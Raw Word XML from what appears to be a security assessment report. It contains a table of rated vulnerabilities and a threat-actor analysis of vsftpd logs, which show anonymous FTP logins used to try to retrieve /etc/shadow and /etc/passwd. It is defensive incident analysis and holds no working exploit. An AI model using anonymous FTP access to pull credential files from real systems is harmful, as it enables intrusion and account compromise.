              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>8</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14BD8B2" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C65CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Local File Inclusion</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25C4E7F4" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</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4410E"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E033377" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="65B48B22"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6973AF16" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="007B30E8" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>9</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610C2F3" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Information Disclosure</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cMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C13A398" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</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cMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3877C45A" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="508CE916"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A4A7A68" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</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46C690" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C65CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Showing SQL Query String</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cMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="143C79E7" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</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cMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6F1D427F" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="6A677EAF" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="107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8D6E103" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="485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682F8C4" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="00A70D80" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A70D80">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Insecure Cryptographic Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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cMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="198E7EC0" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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cMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AA155DC" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F163263" w14:textId="6F2B41F0" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="00E56270">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA217F9" w14:textId="57E5E6A2" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE489EC" w14:textId="2BC1BBDD" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1989CB" w14:textId="257B5DA3" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E55343" w14:textId="040F713B" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328F7593" w14:textId="0A998BEB" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334755FF" w14:textId="504370E1" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9E7F30" w14:textId="0998A5F9" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="2FC7F145" w14:textId="455F294D" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="1CBFB890" w14:textId="363E187E" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="68BEE2CB" w14:textId="79C4BB6D" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="0C7BEA34" w14:textId="3E0B465E" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="48CA27A8" w14:textId="45826A47" w:rsidR="00220DD3" w:rsidRDefault="1A0DA922" w:rsidP="1D8F7EFF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704ED7A7" w14:textId="7AC39122" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="4042618A" w14:textId="23901D43" w:rsidR="00220DD3" w:rsidRDefault="5E6F28E2" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1 – Threat Actor</w:t>
      </w:r>
    </w:p>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3000"/>
        <w:gridCol w:w="6345"/>
      </w:tblGrid>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="6C2A4340" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="934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Mar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22B8C4C0" w14:textId="3C0DA0C5" w:rsidR="1D8F7EFF" w:rsidRDefault="00E247F9" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
            <w:r w:rsidR="1D8F7EFF" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK (10/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="2E22A596" w14:textId="77777777" w:rsidTr="008F62ED">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7E75B222" w14:textId="5736C790" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploitation Likelihood</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90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C08B67A" w14:textId="7F1333BC" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="6346DE6B" w14:textId="77777777" w:rsidTr="008F62ED">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065332BF" w14:textId="6518A74B" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Business Impact</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90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5917350A" w14:textId="239F9058" w:rsidR="1D8F7EFF" w:rsidRDefault="006C65CF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Major</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="4CFF4D64" w14:textId="77777777" w:rsidTr="008F62ED">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179B0FA8" w14:textId="60E179B5" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Remediation Difficulty</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90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="15E6B826" w14:textId="55548547" w:rsidR="1D8F7EFF" w:rsidRDefault="006C65CF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Moderate (Recommendation 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="257B17B4" w14:textId="116E7B16" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDD39BB" w14:textId="6CA108FC" w:rsidR="00220DD3" w:rsidRDefault="5E6F28E2" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB268B3" w14:textId="1E30E2AB" w:rsidR="00812F92" w:rsidRDefault="696735BF" w:rsidP="00812F92">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon examining the log files for the nbnclient image, it was found that an unidentified user </w:t>
      </w:r>
      <w:r w:rsidR="67F7392F" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>tried to connect to the FTP</w:t>
      </w:r>
      <w:r w:rsidR="3721887C" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> server.</w:t>
      </w:r>
      <w:r w:rsidR="3BFADC4C" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> The logs </w:t>
      </w:r>
      <w:r w:rsidR="00812F92">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">can be viewed </w:t>
      </w:r>
      <w:r w:rsidR="3BFADC4C" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="739D0014" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>running:</w:t>
      </w:r>
      <w:r w:rsidR="3BFADC4C" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00812F92" w:rsidRPr="00812F92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="3BFADC4C" w:rsidRPr="00812F92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r w:rsidR="3BFADC4C" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/var/log/vsftpd.log</w:t>
      </w:r>
      <w:r w:rsidR="3721887C" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00812F92">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="118F774E" wp14:editId="66082587">
            <wp:extent cx="4929809" cy="1790216"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="13450828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82843"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1932" cy="1794618"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2507C7F9" w14:textId="336757DF" w:rsidR="00220DD3" w:rsidRDefault="697D7307" w:rsidP="00812F92">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Anonymous user connecting to FTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1CBA45" w14:textId="17DC66B5" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF7BF15" w14:textId="50B07A83" w:rsidR="00220DD3" w:rsidRDefault="0ABEF8D1" w:rsidP="1D8F7EFF">
      <w:r>
        <w:t>The attack was initiated on Sunday, November 11</w:t>
      </w:r>
      <w:r w:rsidR="42BB3521">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="09B50094">
        <w:t>The logs show two clients</w:t>
      </w:r>
      <w:r w:rsidR="19F2B4FA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="09B50094">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4D4AE527" w:rsidRPr="1D8F7EFF">
        <w:t>"127.0.0.1" and "192.168.1.24</w:t>
      </w:r>
      <w:r w:rsidR="09739898" w:rsidRPr="1D8F7EFF">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="4D4AE527" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve"> " </w:t>
      </w:r>
      <w:r w:rsidR="09B50094">
        <w:t>connecting to the FTP service</w:t>
      </w:r>
      <w:r w:rsidR="3F3C6D96">
        <w:t xml:space="preserve"> via the </w:t>
      </w:r>
      <w:r w:rsidR="0E2DEC76">
        <w:t xml:space="preserve">FTP </w:t>
      </w:r>
      <w:r w:rsidR="3F3C6D96">
        <w:t>anonymous login feature.</w:t>
      </w:r>
      <w:r w:rsidR="0E0D2214">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6FEB0B54" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve">Connections originating from "127.0.0.1" are usually internal </w:t>
      </w:r>
      <w:r w:rsidR="46AAF16D" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00812F92" w:rsidRPr="1D8F7EFF">
        <w:t>legitimate</w:t>
      </w:r>
      <w:r w:rsidR="46AAF16D" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6FEB0B54" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve">as they're from the local system, accessing services or processes within itself. However, while connections from "127.0.0.1" are generally legitimate, they could still be manipulated by an attacker. </w:t>
      </w:r>
      <w:r w:rsidR="52380C83" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve">Given </w:t>
      </w:r>
      <w:r w:rsidR="638BFB08" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="623167F0" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve">there was </w:t>
      </w:r>
      <w:r w:rsidR="638BFB08" w:rsidRPr="1D8F7EFF">
        <w:t>a failed login</w:t>
      </w:r>
      <w:r w:rsidR="3B8C0CCF" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve"> attempt and multiple </w:t>
      </w:r>
      <w:bookmarkStart w:id="27" w:name="_Int_0dVHn8Km"/>
      <w:r w:rsidR="3B8C0CCF" w:rsidRPr="1D8F7EFF">
        <w:t>login</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="3B8C0CCF" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve"> attempts around the same time as the connection made by 192.168.1.24, we reason that the client “127.0.0.1” and 192.168.1.24” are the same user.</w:t>
      </w:r>
      <w:r w:rsidR="4CCBA149" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve"> The logs show that the attacker attempted to exfiltrate the /etc/shadow and /etc/passwd </w:t>
      </w:r>
      <w:r w:rsidR="6DEF27B8" w:rsidRPr="1D8F7EFF">
        <w:t>files but</w:t>
      </w:r>
      <w:r w:rsidR="4CCBA149" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve"> was only successful </w:t>
      </w:r>
      <w:r w:rsidR="594768E9" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="3EBF6BD2" w:rsidRPr="1D8F7EFF">
        <w:t>retrieving</w:t>
      </w:r>
      <w:r w:rsidR="78176FB2" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve"> the /etc/passwd file. Given the spoofing capabilities of the attacker, we reason that the</w:t>
      </w:r>
      <w:r w:rsidR="07253820" w:rsidRPr="1D8F7EFF">
        <w:t xml:space="preserve"> adversary is </w:t>
      </w:r>
      <w:r w:rsidR="78176FB2" w:rsidRPr="1D8F7EFF">
        <w:t>highly skille</w:t>
      </w:r>
      <w:r w:rsidR="4FC1BF60" w:rsidRPr="1D8F7EFF">
        <w:t>d.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A39E51" w14:textId="5AF87397" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF"/>
    <w:p w14:paraId="491D1DE9" w14:textId="13ABF650" w:rsidR="00220DD3" w:rsidRDefault="46CFA303" w:rsidP="1D8F7EFF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The /etc/passwd file contains </w:t>
      </w:r>
      <w:r w:rsidR="179FE71D">
        <w:t xml:space="preserve">sensitive </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user account information such as usernames </w:t>
      </w:r>
      <w:r w:rsidR="2116F8A2">
        <w:t xml:space="preserve">and user account details. With this file, the attacker may begin to launch targeted attacks such as social engineering and </w:t>
      </w:r>
      <w:r w:rsidR="7220DEEA">
        <w:t>phishing</w:t>
      </w:r>
      <w:r w:rsidR="2116F8A2">
        <w:t xml:space="preserve"> attacks </w:t>
      </w:r>
      <w:r w:rsidR="264C0CFC">
        <w:t>aimed at</w:t>
      </w:r>
      <w:r w:rsidR="2116F8A2">
        <w:t xml:space="preserve"> the users</w:t>
      </w:r>
      <w:r w:rsidR="19BB1C27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="20F27CDF">
        <w:t xml:space="preserve">listed </w:t>
      </w:r>
      <w:r w:rsidR="19BB1C27">
        <w:t>in the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09594C7B" w14:textId="25FFF177" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF"/>
